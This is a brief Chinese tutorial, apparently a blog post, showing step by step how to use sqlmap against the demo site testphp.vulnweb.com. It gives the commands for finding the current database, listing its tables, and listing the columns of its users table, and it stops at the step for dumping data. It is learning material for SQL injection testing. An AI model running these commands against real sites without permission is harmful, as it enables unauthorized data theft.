1、搭建Python 2.7.X 和SQLmap環境;
2、使用web掃描工具(如ZAP等)找到SQL的可能注入點:“http://testphp.vulnweb.com/artists.php?artist=1”;
3、使用sqlmap 擷取目前資料庫名稱
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db
運作結果如下:
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiInBnauEDOzsGVBZXLwV1RKFUQQhlMPRkMPFULQFDTvl2S39CXwI0LcdDNvwFMw00LcJDMzZWe39CXt92Yu8GdjFTNuMzcvw1LcpDc0RHaiojIsJye.jpg)
4、使用sqlmap 清單名
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --table -D acuart
5、使用sqlmap 列字段名稱
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T users -D acuart -v 0
6、使用sqlmap 擷取字段内容